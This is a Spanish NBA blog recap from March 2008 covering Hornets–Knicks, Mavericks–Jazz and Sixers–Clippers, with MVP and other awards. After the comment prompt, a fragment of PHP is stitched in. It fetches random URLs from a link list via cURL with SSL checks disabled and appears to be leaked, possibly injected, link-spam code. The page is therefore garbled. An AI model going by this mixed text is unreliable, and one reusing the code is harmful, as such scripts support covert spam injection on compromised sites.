La crónica (03/03/08)

04 de March de 2008 por telekoman

Esta madrugada nos ha deparado 3 nuevos e interesantes partidos donde hemos visto la victoria de Hornets sobre Knicks con un gran Chris Paul y algunas decisiones extrañas de Isiah Thomas, una nueva lucha en el Oeste entre Dallas y Utah, donde el aprendiz ha ganado al maestro, y una nueva derrota de los Clippers a mano de unos Sixers que quieren mantener a toda costa su plaza de Playoffs.

 

Comenzamos con

La crónica:TysonAndCurryEl primer partido de la noche nos deparó un interesante Hornets – Knicks. El partido acabó con un solvente 100-88 que no refleja las dificultades que tuvieron los pupilos de Byron Scott. Los protagonistas positivos del partido no pueden ser otros que Chris Paul y Tyson Chandler. El base se fue hasta los 27 puntos, 8 asistencias y 5 rebotes mientras que el pívot llegó hasta los 15 puntos y 18 rebotes. El protagonista negativo es Isiah Thomas, una vez más. El entrenador de los Knicks decidió hacer pruebas con el banquillo durante el último cuarto, cuando todo se estaba decidiendo. Los 20 puntos de Crawford y los 16 rebotes de Lee no fueron suficientes.

NowitzkiFlagrantFoulOnKirilenkoEl partido más interesante de la jornada se disputó en el Energy Solutions Arena de Salt Lake City entre Dallas Mavericks y Utah Jazz. Del duelo de bases que estaba servido y no defraudó en absoluto, salió ganador Deron Williams por KO técnico. Hasta 20 asistencias fue capaz de repartir el joven base, a las que sumó 17 puntos. Por su parte Jason Kidd realizó también un buen encuentro y terminó con 19 puntos y 9 asistencias. El partido estuvo marcado por la falta flagrante de Dirk Nowitzki sobre Kirilenko a finales del primer cuarto y que mandó al jugador ruso al hospital, afortunadamente sin nada grave. De la mano de Boozer, 28 puntos, Okur, 20 puntos y 12 rebotes, Korver, 17 puntos y el nombrado Williams, los Jazz fueron capaces de derrotar por 110-116 a unos Mavericks que nunca perdieron la cara al partido y que tuvieron a 4 hombres con 19 puntos o más.

IgoudalaOverMobbleyHasta 6 jugadores de los Sixers se fueron por encima de 10 puntos en el partido que les enfrentó a los Clippers en Los Angeles. Con esta solvencia Philadelphia ganó comodamente por 106-80 a un equipo en el que el mejor hombre fue el rookie Al Thornton con 20 puntos pero que elevó su cifra de pérdidas hasta 10. Iguodala con 18 puntos y Dalembert con 12 puntos y 12 rebotes fueron los mejores por los Sixers que se afianzan en la séptima plaza de la Conferencia Este a 2 partidos del noveno clasificado. El equipo de Philadelphia está sabiendo conjugar bien la experiencia de hombres como Andre Miller con la juventud de gente como Iguodala, Thaddeus Young o Louis Williams. Esta victoria supuso la número 100 de su entrenador, Maurice Cheeks, a cargo de los Sixers.

Los jugadores:

MVP: Doctorándose ante Jason Kidd. Eso es lo que ha estado haciendo esta noche Deron Williams, que ha acabado el partido con 17 puntos y, atención, 20 asistencias. Será uno de los grandes en el futuro.

Rookie: Tan solo han jugado 2 rookies hoy y uno aparece un poco más abajo. El premio de hoy para Thaddeus Young afianzado en la rotación de los 76ers con unos números más que interesantes en el partido de hoy: 13 puntos, 4 rebotes y 6 de 7 en tiros.

Sorpresa: Mehmet Okur parece haber recuperado el tono en los últimos partidos. Ayer frente a los Mavs acabó con 20 puntos y 12 rebotes y dejando buenas sensaciones de cara a lo que se avecina. Pero si hoy ha habido una sorpresa mayúscula ese es el buen partido de Eddie Curry, nada más y nada menos que 19 puntos y 8 rebotes. No son los mejores números del año pero para lo que acostumbraba Curry últimamente estamos de lo más contentos.

 

Decepción: Ha sido el jugador de los Clippers que más tiempo ha estado sobre la cancha, el más anotador, casi el mejor reboteador, grandes porcentajes de acierto… ¿Por qué entonces es Al Thorton la decepción del día? Pues ni más ni menos que por sus ¡10 pérdidas! Hacía tiempo que no veíamos algo similar.

Os dejamos con las 10 mejores jugadas de la jornada

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>